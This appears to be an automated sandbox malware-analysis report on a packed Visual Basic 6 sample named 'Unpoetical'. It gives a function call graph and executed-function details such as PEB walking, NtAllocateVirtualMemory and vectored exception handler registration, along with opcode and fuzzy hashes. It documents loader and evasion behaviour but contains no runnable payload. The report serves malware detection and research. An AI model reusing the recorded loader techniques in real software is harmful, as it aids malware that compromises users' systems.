2367 41ec8c __vbaStrCopy 2366->2367 2368 41eca5 9 API calls 2367->2368 2369 41ed2e __vbaFreeStr __vbaAryDestruct __vbaFreeStr __vbaFreeStr 2367->2369 2368->2369 2371 20e0000 2372 20e00cb 2371->2372 2376 20e0671 2372->2376 2378 20ed0c6 2372->2378 2374 20e1974 2376->2374 2387 20e08de 2376->2387 2379 20f2767 GetPEB 2378->2379 2380 20ed0d3 2379->2380 2397 20ed0de 2380->2397 2388 20e09a1 2387->2388 2389 20ed860 2 API calls 2388->2389 2390 20e09ca 2389->2390 2391 20f2767 GetPEB 2390->2391 2392 20e09dc 2391->2392 2393 20f2767 GetPEB 2392->2393 2394 20e09ec 2393->2394 2420 20e09fb 2394->2420 2398 20ed1b6 2397->2398 2414 20ed860 2398->2414 2415 20ed86e 2414->2415 2418 20edc26 2414->2418 2416 20f2767 GetPEB 2415->2416 2417 20ed99d NtAllocateVirtualMemory 2416->2417 2417->2418 2423 20f6850 2420->2423 2424 20f6855 2 API calls 2423->2424 2853 41f18e __vbaChkstk __vbaStrCopy __vbaStrCopy __vbaLenBstrB #564 2854 41f220 __vbaHresultCheck 2853->2854 2855 41f233 2853->2855 2856 41f23a __vbaVarTstLt __vbaFreeVarList 2854->2856 2855->2856 2857 41f272 11 API calls 2856->2857 2858 41f325 __vbaStrCopy 2856->2858 2857->2858 2859 41f375 __vbaFreeStr __vbaFreeStr __vbaFreeVar __vbaFreeStr 2858->2859 2515 20e5e5a 2516 20e5e7a 2515->2516 2519 20e56b3 2516->2519 2520 20e5718 2519->2520 2521 20ed860 2 API calls 2520->2521 2522 20e57a2 2521->2522 2175 41c254 __vbaChkstk 2176 41c2a1 8 API calls 2175->2176 2177 41c366 10 API calls 2176->2177 2178 41c41b #610 #661 __vbaVarTstGe __vbaFreeVarList 2176->2178 2177->2178 2179 41c49b 7 API calls 2178->2179 2180 41c4ff __vbaVarDup #560 __vbaFreeVar 2178->2180 2179->2180 2181 41c87d #519 __vbaStrMove #519 __vbaStrMove __vbaStrMove 2180->2181 2182 41c55c 15 API calls 2180->2182 2267 41d90c __vbaChkstk #692 __vbaVarTstNe __vbaFreeVar 2181->2267 2183 41c788 __vbaNew2 2182->2183 2185 41c7a3 2182->2185 2183->2185 2184 41c8ef __vbaFreeStrList #648 __vbaStrCopy 2186 41c99c __vbaFreeStr __vbaFreeVar #527 __vbaStrMove 2184->2186 2187 41c804 2185->2187 2188 41c7e4 __vbaHresultCheckObj 2185->2188 2280 41e6dd 10 API calls 2186->2280 2193 41c860 2187->2193 2194 41c840 __vbaHresultCheckObj 2187->2194 2188->2187 2189 41c9f4 __vbaFreeStr __vbaStrCopy 2190 41ca30 2189->2190 2191 41ca5f 2190->2191 2192 41ca3f __vbaHresultCheckObj 2190->2192 2195 41ca66 __vbaStrMove __vbaFreeStr #535 #564 2191->2195 2192->2195 2196 41c867 __vbaFreeObj 2193->2196 2194->2196 2197 41cad5 __vbaHresultCheck 2195->2197 2198 41cae8 2195->2198 2196->2181 2199 41caef #685 __vbaObjSet 2197->2199 2198->2199 2200 41cb1f 2199->2200 2201 41cb50 2200->2201 2202 41cb30 __vbaHresultCheckObj 2200->2202 2203 41cb57 __vbaI4Var 2201->2203 2202->2203 2204 41cbbc 2203->2204 2205 41cbeb 2204->2205 2206 41cbcb __vbaHresultCheckObj 2204->2206 2207 41cbf2 7 API calls 2205->2207 2206->2207 2208 41ccba 2207->2208 2209 41cce9 2208->2209 2210 41ccc9 __vbaHresultCheckObj 2208->2210 2211 41ccf0 __vbaFreeStr __vbaFreeVar #648 2209->2211 2210->2211 2212 41cd55 2211->2212 2213 41cd84 2212->2213 2214 41cd64 __vbaHresultCheckObj 2212->2214 2215 41cd8b __vbaFreeVar #648 #714 #648 #564 2213->2215 2214->2215 2216 41ce47 __vbaHresultCheck 2215->2216 2217 41ce5a 2215->2217 2218 41ce61 __vbaI4Var __vbaI4Var 2216->2218 2217->2218 2219 41ced2 7 API calls 2218->2219 2220 41cfa7 7 API calls 2219->2220 2221 41d086 2220->2221 2222 41d0b5 2221->2222 2223 41d095 __vbaHresultCheckObj 2221->2223 2224 41d0bc __vbaFreeStr __vbaFreeVar #696 2222->2224 2223->2224 2225 41d10e __vbaStrCopy 2224->2225 2227 41d192 2225->2227 2228 41d1c1 2227->2228 2229 41d1a1 __vbaHresultCheckObj 2227->2229 2230 41d1c8 __vbaFreeStr 2228->2230 2229->2230 2284 41fb40 __vbaChkstk 2230->2284 2231 41d20d 2232 41d23c 2231->2232 2233 41d21c __vbaHresultCheckObj 2231->2233 2234 41d243 6 API calls 2232->2234 2233->2234 2235 41d2fe __vbaFreeStrList __vbaFreeVarList #705 __vbaStrMove __vbaLenBstrB 2234->2235 2300 4202f4 __vbaChkstk 2235->2300 2236 41d380 2237 41d3af 2236->2237 2238 41d38f __vbaHresultCheckObj 2236->2238 2239 41d3b6 __vbaFreeStr __vbaFreeVar __vbaLenBstr 2237->2239 2238->2239 2240 41d402 2239->2240 2241 41d431 2240->2241 2242 41d411 __vbaHresultCheckObj 2240->2242 2243 41d438 7 API calls 2241->2243 2242->2243 2244 41d4f9 2243->2244 2245 41d528 2244->2245 2246 41d508 __vbaHresultCheckObj 2244->2246 2247 41d52f __vbaStrMove __vbaFreeStrList 2245->2247 2246->2247 2248 41d595 #564 2247->2248 2249 41d907 2247->2249 2250 41d5c1 __vbaHresultCheck 2248->2250 2251 41d5d4 2248->2251 2249->2249 2252 41d5db 7 API calls 2250->2252 2251->2252 2253 41d69a 2252->2253 2254 41d6c9 2253->2254 2255 41d6a9 __vbaHresultCheckObj 2253->2255 2256 41d6d0 __vbaFreeStrList __vbaFreeVarList #696 #696 __vbaStrCopy 2254->2256 2255->2256 2319 420fbc __vbaChkstk __vbaStrCopy #582 __vbaFpR8 2256->2319 2257 41d78d __vbaFreeStr 2323 421223 __vbaChkstk #644 2257->2323 2259 41d79d __vbaVarMove __vbaVarMove __vbaVarIdiv __vbaI4Var 2260 41d80a 9 API calls 2259->2260 2268 41d987 #618 __vbaStrMove 2267->2268 2269 41da98 __vbaStrCopy #618 __vbaStrMove __vbaStrCmp __vbaFreeStr 2267->2269 2272 41d9c1 2268->2272 2273 41d9a6 __vbaNew2 2268->2273 2270 41dba9 __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 2269->2270 2271 41daea 14 API calls 2269->2271 2270->2184 2271->2270 2275 41da1f 2272->2275 2276 41d9ff __vbaHresultCheckObj 2272->2276 2273->2272 2277 41da5b __vbaHresultCheckObj 2275->2277 2278 41da7e 2275->2278 2276->2275 2279 41da85 __vbaFreeObj 2277->2279 2278->2279 2279->2269 2281 41e7cb __vbaFreeStr __vbaFreeObj __vbaFreeStr __vbaFreeStr 2280->2281 2282 41e79e #697 __vbaStrMove __vbaStrCat __vbaStrMove 2280->2282 2281->2189 2282->2281 2285 41fb82 __vbaStrCopy __vbaAryConstruct2 2284->2285 2286 41fba4 #593 __vbaFreeVar #537 __vbaStrMove 2285->2286 2287 41fbda 9 API calls 2285->2287 2286->2287 2288 41fe34 #628 #670 __vbaVarTstNe __vbaFreeVarList 2287->2288 2289 41fcb6 7 API calls 2287->2289 2292 4200e7 __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaAryDestruct __vbaFreeStr 2288->2292 2293 41fe9e 26 API calls 2288->2293 2290 41fd42 __vbaNew2 2289->2290 2291 41fd5d 2289->2291 2290->2291 2295 41fdbb 2291->2295 2296 41fd9b __vbaHresultCheckObj 2291->2296 2292->2231 2293->2292 2297 41fdf7 __vbaHresultCheckObj 2295->2297 2298 41fe1a 2295->2298 2296->2295 2299 41fe21 __vbaFreeObj 2297->2299 2298->2299 2299->2288 2301 42033d #575 #518 __vbaVarTstLt __vbaFreeVarList 2300->2301 2302 4203c3 2301->2302 2303 420569 __vbaRedim #564 2301->2303 2306 4203d3 __vbaNew2 2302->2306 2308 4203ee 2302->2308 2304 42066b __vbaHresultCheck 2303->2304 2305 42067e 2303->2305 2307 420685 __vbaI4Var __vbaFreeVarList 2304->2307 2305->2307 2306->2308 2309 420771 __vbaAryDestruct __vbaFreeStr 2307->2309 2310 420717 __vbaOnError __vbaStrI4 __vbaStrMove #578 __vbaFreeStr 2307->2310 2312 42044c 2308->2312 2313 42042c __vbaHresultCheckObj 2308->2313 2309->2236 2310->2309 2314 420453 __vbaChkstk __vbaStrI4 __vbaStrMove 2312->2314 2313->2314 2315 4204aa 2314->2315 2316 4204bb __vbaHresultCheckObj 2315->2316 2317 4204de 2315->2317 2318 4204e5 8 API calls 2316->2318 2317->2318 2318->2303 2320 421071 __vbaFreeStr __vbaFreeObj 2319->2320 2321 421031 __vbaOnError #716 __vbaObjVar __vbaObjSetAddref __vbaFreeVar 2319->2321 2320->2257 2321->2320 2323->2259 2425 41ee54 7 API calls 2426 41f0f0 #536 __vbaStrMove __vbaFreeVar 2425->2426 2427 41eef3 2425->2427 2428 41f14a __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 2426->2428 2429 41eefc __vbaNew2 2427->2429 2430 41ef17 2427->2430 2429->2430 2431 41ef60 2430->2431 2432 41ef46 __vbaHresultCheckObj 2430->2432 2433 41efa7 2431->2433 2434 41ef8a __vbaHresultCheckObj 2431->2434 2432->2431 2435 41efae __vbaStrMove __vbaFreeObj 2433->2435 2434->2435 2436 41eff5 2435->2436 2437 41efda __vbaNew2 2435->2437 2438 41f024 __vbaHresultCheckObj 2436->2438 2439 41f03e 2436->2439 2437->2436 2440 41f045 __vbaChkstk #703 __vbaStrMove 2438->2440 2439->2440 2441 41f0a9 2440->2441 2442 41f0d1 2441->2442 2443 41f0b4 __vbaHresultCheckObj 2441->2443 2444 41f0d8 __vbaFreeStr __vbaFreeObj __vbaFreeVar 2442->2444 2443->2444 2444->2426 2551 420ed7 __vbaChkstk 2552 420f17 6 API calls 2551->2552 2553 420f82 __vbaFreeStr __vbaFreeStr 2552->2553 2786 4207d7 __vbaChkstk 2787 420820 2786->2787 2788 420931 8 API calls 2787->2788 2789 420838 #535 2787->2789 2790 420a57 __vbaFreeStr __vbaFreeStr 2788->2790 2791 420a2e __vbaOnError #527 __vbaStrMove 2788->2791 2792 420857 __vbaNew2 2789->2792 2794 420872 2789->2794 2791->2790 2792->2794 2795 4208d0 2794->2795 2796 4208b0 __vbaHresultCheckObj 2794->2796 2797 420922 2795->2797 2798 420902 __vbaHresultCheckObj 2795->2798 2796->2795 2799 420929 __vbaFreeObj 2797->2799 2798->2799 2799->2788 2591 20e2cd8 2592 20e2d56 2591->2592 2594 20e28b3 2592->2594 2596 20ec607 GetPEB 2592->2596 2595 20e2e05 2596->2595 2523 41e819 __vbaChkstk 2524 41e859 __vbaInStrB 2523->2524 2525 41e910 #696 #698 __vbaStrVarMove __vbaStrMove __vbaFreeVar 2524->2525 2526 41e880 9 API calls 2524->2526 2527 41e972 __vbaFreeStr __vbaFreeStr 2525->2527 2526->2525 2554 20f2697 GetPEB 2555 20e5894 2556 20e58c9 2555->2556 2558 20e58e1 2555->2558 2557 20ed860 2 API calls 2556->2557 2557->2558 2597 20e54d5 2598 20ed860 2 API calls 2597->2598 2599 20e54e3 2598->2599 2355 20f6850 2357 20f6855 2355->2357 2358 20f6860 2357->2358 2363 20f47f1 2358->2363 2360 20f6a5d 2361 20f7542 RtlAddVectoredExceptionHandler 2360->2361 2362 20ec619 2360->2362 2361->2362 2364 20f2fd3 GetPEB 2363->2364 2365 20f47fc 2364->2365 2365->2360 2559 420add __vbaChkstk 2560 420b1f 10 API calls 2559->2560 2561 420c8a __vbaVarDup #542 __vbaVarTstNe __vbaFreeVarList 2560->2561 2562 420bfe 9 API calls 2560->2562 2563 420e26 __vbaStrCopy 2561->2563 2564 420d05 #690 2561->2564 2562->2561 2565 420e77 7 API calls 2563->2565 2566 420d42 2564->2566 2567 420d27 __vbaNew2 2564->2567 2568 420d80 __vbaHresultCheckObj 2566->2568 2569 420da0 2566->2569 2567->2566 2568->2569 2570 420dd9 __vbaHresultCheckObj 2569->2570 2571 420dfc 2569->2571 2572 420e03 __vbaStrMove __vbaFreeObj 2570->2572 2571->2572 2572->2563 2800 20ee191 2801 20f2767 GetPEB 2800->2801 2802 20ee1a5 2801->2802 2803 20f2767 GetPEB 2802->2803 2804 20ee1bb 2803->2804 2805 20f2767 GetPEB 2804->2805 2806 20ee1d1 2805->2806 2807 20f2767 GetPEB 2806->2807 2808 20ee2a2 2807->2808 2809 20f2767 GetPEB 2808->2809 2812 20ee2bd 2809->2812 2810 20f6850 GetPEB RtlAddVectoredExceptionHandler 2810->2812 2811 20ed0c6 4 API calls 2814 20e1970 2811->2814 2812->2810 2816 20eeba1 2812->2816 2817 20e190b 2812->2817 2821 20e1910 2812->2821 2813 20e1974 2814->2813 2815 20e08de 3 API calls 2814->2815 2823 20ef9b1 2815->2823 2818 20f6850 2 API calls 2816->2818 2820 20e168f 5 API calls 2817->2820 2819 20eebb2 2818->2819 2822 20f6850 2 API calls 2819->2822 2820->2821 2821->2811 2821->2814 2825 20e1929 2821->2825 2824 20eeca1 2822->2824 2737 20e3d6e 2738 20e3dde 2737->2738 2739 20e9768 6 API calls 2738->2739 2740 20e3eb2 2738->2740 2739->2738 2741 20f6850 2 API calls 2740->2741 2742 20ec538 2741->2742 2743 20f2fd3 GetPEB 2742->2743 2744 20f3ecb 2743->2744 2577 20e16af 2580 20e1744 2577->2580 2578 20ed0c6 4 API calls 2581 20e1970 2578->2581 2579 20e1974 2583 20e168f 5 API calls 2580->2583 2584 20e1910 2580->2584 2581->2579 2582 20e08de 3 API calls 2581->2582 2586 20ef9b1 2582->2586 2583->2584 2584->2578 2584->2581 2585 20e1929 2584->2585 2826 41f7e0 __vbaChkstk 2827 41f833 2826->2827 2828 41f818 __vbaNew2 2826->2828 2829 41f871 __vbaHresultCheckObj 2827->2829 2830 41f891 2827->2830 2828->2827 2829->2830 2831 41f8e3 2830->2831 2832 41f8c3 __vbaHresultCheckObj 2830->2832 2833 41f8ea 7 API calls 2831->2833 2832->2833 2834 41fa07 #696 2833->2834 2835 41f94b 14 API calls 2833->2835 2836 41fa43 __vbaFreeStr __vbaFreeStr __vbaFreeStr 2834->2836 2835->2834 2445 20e282d 2446 20f2767 GetPEB 2445->2446 2447 20e283f 2446->2447 2448 20f2767 GetPEB 2447->2448 2449 20e2872 2448->2449 2452 20e288e 2449->2452 2453 20ed860 2 API calls 2452->2453 2454 20e28ad 2453->2454 2137 4210a6 __vbaChkstk __vbaObjSetAddref 2138 4210ee 2137->2138 2139 421110 2138->2139 2140 4210f9 __vbaHresultCheckObj 2138->2140 2141 421114 __vbaObjSetAddref #644 2139->2141 2140->2141 2152 4212f5 __vbaChkstk 2141->2152 2144 4212f5 5 API calls 2145 421148 2144->2145 2160 421375 __vbaChkstk 2145->2160 2147 42115b __vbaChkstk __vbaChkstk 2148 4211a7 2147->2148 2149 4211b2 __vbaHresultCheckObj 2148->2149 2150 4211cc __vbaFreeObj 2148->2150 2149->2150 2153 42130b 2152->2153 2159 421135 __vbaFreeObj 2152->2159 2162 421335 __vbaChkstk 2153->2162 2156 421335 3 API calls 2157 421322 2156->2157 2170 421411 __vbaChkstk 2157->2170 2159->2144 2161 42138c 2160->2161 2161->2147 2163 42134b 2162->2163 2169 421313 2162->2169 2171 421273 __vbaChkstk 2163->2171 2166 421273 __vbaChkstk 2167 421360 2166->2167 2173 4212a5 __vbaChkstk 2167->2173 2169->2156 2170->2159 2172 421289 2171->2172 2172->2166 2174 4212c0 2173->2174 2174->2169 2863 20e29eb 2864 20e2ad1 2863->2864 2867 20ec607 GetPEB 2864->2867 2866 20e2e05 2867->2866 2528 20e1669 2529 20ed860 2 API calls 2528->2529 2530 20e1677 2529->2530 2531 20f2767 GetPEB 2530->2531 2532 20e1682 2531->2532 2541 20e168f 2532->2541 2534 20e1929 2535 20e1910 2535->2534 2536 20ed0c6 4 API calls 2535->2536 2537 20e1970 2535->2537 2536->2537 2538 20e08de 3 API calls 2537->2538 2539 20e1974 2537->2539 2540 20ef9b1 2538->2540 2544 20e1744 2541->2544 2542 20ed0c6 4 API calls 2545 20e1970 2542->2545 2543 20e1974 2543->2535 2544->2535 2547 20e168f 5 API calls 2544->2547 2549 20e1910 2544->2549 2545->2543 2546 20e08de 3 API calls 2545->2546 2548 20ef9b1 2546->2548 2547->2549 2549->2542 2549->2545 2550 20e1929 2549->2550 2600 20e08e9 2601 20e09a1 2600->2601 2602 20ed860 2 API calls 2601->2602 2603 20e09ca 2602->2603 2604 20f2767 GetPEB 2603->2604 2605 20e09dc 2604->2605 2606 20f2767 GetPEB 2605->2606 2607 20e09ec 2606->2607 2608 20e09fb 2 API calls 2607->2608 2609 20f7a83 2608->2609 2868 41e9aa __vbaChkstk 2869 41e9ea 8 API calls 2868->2869 2870 41ea56 2869->2870 2871 41ea61 __vbaHresultCheckObj 2870->2871 2872 41ea78 2870->2872 2873 41ea7c 10 API calls 2871->2873 2872->2873 2874 41eb16 #611 __vbaStrMove 2873->2874 2875 41ebea __vbaFreeStr __vbaFreeStr __vbaFreeStr 2873->2875 2876 41eb49 2874->2876 2877 41eb2e __vbaNew2 2874->2877 2879 41eb92 2876->2879 2880 41eb78 __vbaHresultCheckObj 2876->2880 2877->2876 2881 41ebd3 2879->2881 2882 41ebb9 __vbaHresultCheckObj 2879->2882 2880->2879 2883 41ebda __vbaFreeObj 2881->2883 2882->2883 2883->2875 2745 20e2b63 2746 20e2b71 2745->2746 2747 20f2b1a GetPEB 2746->2747 2748 20e2c95 2746->2748 2747->2746 2749 20f3ec1 2748->2749 2751 20e2cc1 2748->2751 2750 20f2fd3 GetPEB 2749->2750 2752 20f3ecb 2750->2752 2754 20e28b3 2751->2754 2756 20ec607 GetPEB 2751->2756 2755 20e2e05 2756->2755 2326 20ed860 2327 20ed86e 2326->2327 2330 20edc26 2326->2330 2332 20f2767 2327->2332 2333 20f27da 2332->2333 2334 20f27c6 2332->2334 2340 20f27e9 2333->2340 2344 20f2fd3 GetPEB 2334->2344 2336 20f27d0 2338 20f27e9 GetPEB 2336->2338 2338->2333 2342 20f28e0 2340->2342 2343 20ed99d NtAllocateVirtualMemory 2342->2343 2346 20f2b1a 2342->2346 2343->2330 2345 20f2feb 2344->2345 2345->2336 2348 20f2767 2346->2348 2347 20f2da0 2347->2342 2348->2347 2349 20f27da 2348->2349 2350 20f2fd3 GetPEB 2348->2350 2352 20f27e9 GetPEB 2349->2352 2351 20f27d0 2350->2351 2353 20f27e9 GetPEB 2351->2353 2354 20f27e5 2352->2354 2353->2349 2354->2342 2884 41f3b1 __vbaChkstk 2885 41f3f1 #707 __vbaStrMove 2884->2885 2886 41f40a #593 __vbaFreeVar #537 __vbaStrMove 2885->2886 2887 41f43d __vbaFreeStr __vbaFreeStr 2885->2887 2886->2887 2769 20e197a 2770 20e1a5b 2769->2770 2771 20e08de 3 API calls 2770->2771 2772 20ef9b1 2771->2772 2455 20e2636 2456 20e2726 2455->2456 2457 20ed860 2 API calls 2456->2457 2458 20e2817 2457->2458 2459 41fa79 __vbaChkstk 2460 41fab9 7 API calls 2459->2460 2461 41fb08 __vbaFreeStr __vbaFreeStr __vbaFreeStr 2460->2461 2610 20e1936 2612 20e1941 2610->2612 2611 20e1970 2614 20e08de 3 API calls 2611->2614 2615 20e1974 2611->2615 2612->2611 2613 20ed0c6 4 API calls 2612->2613 2613->2611 2616 20ef9b1 2614->2616 2773 20ecb77 2775 20ecb7e 2773->2775 2776 20ecebd 2775->2776 2777 20ecec0 2775->2777 2779 20ecec5 2777->2779 2778 20f2fd3 GetPEB 2781 20f3ecb 2778->2781 2779->2777 2779->2778 2780 20ecff4 2779->2780 2780->2775 2462 20e2e32 2463 20f2767 GetPEB 2462->2463 2464 20e2e38 2463->2464 2465 41f47e 7 API calls 2466 41f664 __vbaVarDup #629 __vbaLenVar __vbaVarTstNe __vbaFreeVarList 2465->2466 2467 41f51b __vbaVarDup #518 __vbaStrVarMove __vbaStrMove __vbaFreeVarList 2465->2467 2468 41f700 8 API calls 2466->2468 2469 41f76e __vbaFreeStr __vbaFreeStr __vbaFreeStr 2466->2469 2470 41f593 2467->2470 2471 41f578 __vbaNew2 2467->2471 2468->2469 2473 41f5d1 __vbaHresultCheckObj 2470->2473 2474 41f5f1 2470->2474 2471->2470 2473->2474 2475 41f64a 2474->2475 2476 41f62a __vbaHresultCheckObj 2474->2476 2477 41f651 __vbaFreeObj 2475->2477 2476->2477 2477->2466

      Executed Functions

      Function 020ED0DE, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 222COMMON
      Download Yara Rule

      Control-flow Graph

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_20e0000_Unpoetical.jbxd
      Yara matches
      Similarity
      • API ID: AllocateMemoryVirtual
      • String ID: O${*B*${*B*
      • API String ID: 2167126740-2738034631
      • Opcode ID: d90b859ad1c26f75d86d10b56b46be3100c52cde2bf36b52f8bc9c5c7ec792f6
      • Instruction ID: 7013e1257abdaae1f027d5c438a0d0811584710e2cf3d56688697753702099db
      • Opcode Fuzzy Hash: d90b859ad1c26f75d86d10b56b46be3100c52cde2bf36b52f8bc9c5c7ec792f6
      • Instruction Fuzzy Hash: 809125739583409FEB609F20C8E86E8BBB6EF11365F15016DDC899B230D3321986EF59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020ED0C6, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151memorynativeCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      • NtAllocateVirtualMemory.NTDLL(-D47CA15A), ref: 020EDC09
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_20e0000_Unpoetical.jbxd
      Yara matches
      Similarity
      • API ID: AllocateMemoryVirtual
      • String ID: O${*B*
      • API String ID: 2167126740-3952971812
      • Opcode ID: 2bb5af6b9b02ae486b891daf6b9bdcbcf34043c6fe509c653d6e5bd60a8bee55
      • Instruction ID: a47c66a1c3a92f949890f57b4591019a43bae942de77ccc4bc4811d0409c9126
      • Opcode Fuzzy Hash: 2bb5af6b9b02ae486b891daf6b9bdcbcf34043c6fe509c653d6e5bd60a8bee55
      • Instruction Fuzzy Hash: 3051E2735583408FEBA09E20C8E86E8BB76EF11366F15055CDC895B231D3325986EF1A
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020ED860, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99memorynativeCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 246 20ed860-20ed868 247 20ed86e-20edc20 call 20f2767 NtAllocateVirtualMemory 246->247 248 20edc26-20edd2c call 20f25ab 246->248 247->248 256 20ede8a-20ede99 call 20edd31 248->256
      APIs
      • NtAllocateVirtualMemory.NTDLL(-D47CA15A), ref: 020EDC09
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_20e0000_Unpoetical.jbxd
      Yara matches
      Similarity
      • API ID: AllocateMemoryVirtual
      • String ID: O
      • API String ID: 2167126740-878818188
      • Opcode ID: f00bfefa0f2c650b5003c6750033c917ebbc343093f44dd045474d65d0b1e5e4
      • Instruction ID: f29aa0ffa7d21f87b1220eac92d982ea5046c34219fc4fc063d6ba0543d913a0
      • Opcode Fuzzy Hash: f00bfefa0f2c650b5003c6750033c917ebbc343093f44dd045474d65d0b1e5e4
      • Instruction Fuzzy Hash: 1D41FF7251A344CFDB70AF28DC957ED7BA6EF19350F06091DEC8A9B260C3318A80DB52
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020F6855, Relevance: 1.7, APIs: 1, Instructions: 212COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 261 20f6855-20f685f 262 20f6860-20f696e 261->262 264 20f6974-20f6b30 call 20f47f1 262->264 269 20f6b36-20f6c02 264->269 271 20f6c08-20f6dae 269->271 274 20ec619-20ec61d 271->274 275 20f6db4-20f70f4 271->275 277 20ec61e-20ec736 274->277 283 20f70fa-20f7240 call 20f7129 275->283 281 20ec73c-20ec73e 277->281 288 20f7246-20f7260 283->288 288->274 289 20f7266-20f739f call 20f76f7 288->289 294 20f761d-20f7720 289->294 295 20f73a5-20f73d0 289->295 304 20f7726-20f775b 294->304 295->294 297 20f73d6-20f73e8 295->297 297->294 298 20f73ee-20f74bb 297->298 298->294 301 20f74c1-20f74d5 298->301 301->294 303 20f74db-20f7503 301->303 303->294 305 20f7509-20f7536 303->305 304->294 306 20f7761-20f778c 304->306 305->294 307 20f753c-20f754a call 20f76f7 RtlAddVectoredExceptionHandler 305->307 306->294 308 20f7792 306->308 311 20f7603-20f7605 307->311 312 20f760b-20f7613 311->312 312->312 313 20f7615 312->313 313->294
      APIs
      • RtlAddVectoredExceptionHandler.NTDLL ref: 020F7542
      Memory Dump Source
      • Source File: 00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_20e0000_Unpoetical.jbxd
      Yara matches
      Similarity
      • API ID: ExceptionHandlerVectored
      • String ID:
      • API String ID: 3310709589-0
      • Opcode ID: 10d8e739e8503b97ee9f9179fbf0521c064f84bd33223b1e49cb8064b4ebeecb
      • Instruction ID: 2f9b0e4c714ffdca9ff998320c0ddf7b33fc5fc5d6b4bf852ffdca7bc5fbab8d
      • Opcode Fuzzy Hash: 10d8e739e8503b97ee9f9179fbf0521c064f84bd33223b1e49cb8064b4ebeecb
      • Instruction Fuzzy Hash: D8812671644348CFCBB5DE28CDA83EE77B2AF84310F95412ACD0A9FA64D3355A81DB42
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041C254, Relevance: 375.8, APIs: 174, Strings: 40, Instructions: 1267COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 41c254-41c360 __vbaChkstk __vbaAryConstruct2 __vbaVarDup #522 __vbaStrVarVal #713 #558 __vbaFreeStr __vbaFreeVarList 2 41c366-41c418 #541 __vbaStrVarMove __vbaStrMove __vbaFreeVar __vbaVarDup #524 __vbaStrVarVal #690 __vbaFreeStr __vbaFreeVarList 0->2 3 41c41b-41c499 #610 #661 __vbaVarTstGe __vbaFreeVarList 0->3 2->3 4 41c49b-41c4fa #705 __vbaStrMove __vbaFreeVar #670 __vbaStrVarMove __vbaStrMove __vbaFreeVar 3->4 5 41c4ff-41c556 __vbaVarDup #560 __vbaFreeVar 3->5 4->5 6 41c87d-41ca3d #519 __vbaStrMove #519 __vbaStrMove * 2 call 41d90c __vbaFreeStrList #648 __vbaStrCopy __vbaFreeStr __vbaFreeVar #527 __vbaStrMove call 41e6dd __vbaFreeStr __vbaStrCopy 5->6 7 41c55c-41c786 #648 __vbaFreeVar __vbaVarDup #606 __vbaStrMove __vbaLenBstr #574 __vbaStrMove #696 __vbaFreeStrList __vbaFreeVarList #648 __vbaFreeVar #696 * 2 5->7 20 41ca5f 6->20 21 41ca3f-41ca5d __vbaHresultCheckObj 6->21 8 41c7a3 7->8 9 41c788-41c7a1 __vbaNew2 7->9 11 41c7ad-41c7e2 8->11 9->11 14 41c804 11->14 15 41c7e4-41c802 __vbaHresultCheckObj 11->15 16 41c80b-41c83e 14->16 15->16 22 41c860 16->22 23 41c840-41c85e __vbaHresultCheckObj 16->23 24 41ca66-41cad3 __vbaStrMove __vbaFreeStr #535 #564 20->24 21->24 25 41c867-41c878 __vbaFreeObj 22->25 23->25 26 41cad5-41cae6 __vbaHresultCheck 24->26 27 41cae8 24->27 25->6 28 41caef-41cb2e #685 __vbaObjSet 26->28 27->28 30 41cb50 28->30 31 41cb30-41cb4e __vbaHresultCheckObj 28->31 32 41cb57-41cbc9 __vbaI4Var 30->32 31->32 34 41cbeb 32->34 35 41cbcb-41cbe9 __vbaHresultCheckObj 32->35 36 41cbf2-41ccc7 __vbaFreeObj __vbaFreeVarList #537 __vbaStrMove #696 #648 __vbaR8FixI4 34->36 35->36 38 41cce9 36->38 39 41ccc9-41cce7 __vbaHresultCheckObj 36->39 40 41ccf0-41cd62 __vbaFreeStr __vbaFreeVar #648 38->40 39->40 42 41cd84 40->42 43 41cd64-41cd82 __vbaHresultCheckObj 40->43 44 41cd8b-41ce45 __vbaFreeVar #648 #714 #648 #564 42->44 43->44 45 41ce47-41ce58 __vbaHresultCheck 44->45 46 41ce5a 44->46 47 41ce61-41d093 __vbaI4Var * 2 __vbaFreeVarList #581 #713 __vbaStrMove __vbaFpI4 __vbaStrCopy __vbaStrMove * 2 __vbaFreeStrList #696 #574 __vbaStrMove __vbaR8IntI4 __vbaLenBstrB 45->47 46->47 51 41d0b5 47->51 52 41d095-41d0b3 __vbaHresultCheckObj 47->52 53 41d0bc-41d19f __vbaFreeStr __vbaFreeVar #696 __vbaStrCopy 51->53 52->53 57 41d1c1 53->57 58 41d1a1-41d1bf __vbaHresultCheckObj 53->58 59 41d1c8-41d21a __vbaFreeStr call 41fb40 57->59 58->59 61 41d23c 59->61 62 41d21c-41d23a __vbaHresultCheckObj 59->62 63 41d243-41d38d __vbaVarDup #607 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaLenBstrB __vbaFreeStrList __vbaFreeVarList #705 __vbaStrMove __vbaLenBstrB call 4202f4 61->63 